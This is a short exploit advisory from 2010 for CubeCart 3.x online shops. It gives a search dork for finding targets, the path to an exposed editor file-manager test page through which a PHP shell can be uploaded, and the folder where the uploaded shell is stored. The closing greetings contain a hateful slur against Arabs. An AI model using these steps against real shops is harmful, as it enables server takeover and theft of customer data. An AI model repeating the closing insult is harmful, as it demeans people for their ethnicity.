1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
============================================================================== [»] CubeCart v 3.x Remote File Upload Vulnerability ============================================================================== [»] Title : [ CubeCart v 3.x Remote Shell Upload Vulnerability ] [»] Script: [ CubeCart v3.x] [»] Language: [ PHP ] [»] Download: [ http://www.cubecart.com/ ] [»] Author: [ StunTMaN! - stunt.man@att.net } [»] Info: [ I'm S.W.A.T. | Old Persian Hacker | New Nickname | ;) ] [»] Date: [ 2010-12-13 ] [»] Version : [ 3.0.X and 3.2.x ] [»] Dork: [ "Powered by CubeCart 3.0.0" ] [»] Bug Info: [ Use Your Mind To How To Upload PHP Shell Script On This CMS ] ########################################################################### ===[ Exploit ]=== [»] http://server/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html [»] Just use PHP Mode for uploading your files ===[ Upload To ]=== [»] http://server/images/File/[Shell] Greetz : All IRANIAN Hackerz ~ Cyber Hackerz Persian Gulf For Ever ~ Not Damn Mother F***er Arabians!! ########################################################################### |